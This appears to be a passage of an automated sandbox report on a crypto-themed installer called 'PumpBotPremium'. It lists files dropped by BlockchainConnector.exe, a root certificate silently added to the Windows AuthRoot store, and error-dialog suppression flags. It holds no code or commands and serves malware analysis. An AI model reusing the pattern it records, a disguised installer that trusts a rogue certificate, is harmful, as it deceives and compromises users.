Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_clmul.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\bit_generator.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs\libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA1.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_queue.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\sip.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtWidgets.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_sqlite3.pyd	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8554.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_cpuid_c.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\tcl86t.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7BF7.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5widgets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md__mypyc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_brotli.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cryptography\hazmat\bindings\_rust.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_umath.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_generator.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_common.pyd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C48.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imaging.pyd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7B99.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\cv2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pythoncom310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_mt19937.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_bz2.pyd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7CB7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_BLAKE2s.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pyexpat.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aesni.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\fft\_pocketfft_internal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\mtrand.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_tests.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingft.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5gui.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_eksblowfish.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtGui.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\concrt140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\vcruntime140_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_bounded_integers.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_elementtree.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cbc.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ctr.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Protocol\_scrypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ofb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_sfc64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_cfb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ssl.pyd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C27.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5core.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\win32crypt.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\linalg\_umath_linalg.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_pcg64.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ocb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_webp.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA256.pyd	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C87.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_ecb.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imagingcms.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_strxor.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\python3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\opencv_videoio_ffmpeg490_64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pywintypes310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtCore.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_tkinter.pyd	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7CB7.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C27.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C87.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C48.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7B99.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8554.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7BF7.tmp	Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 Blob

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
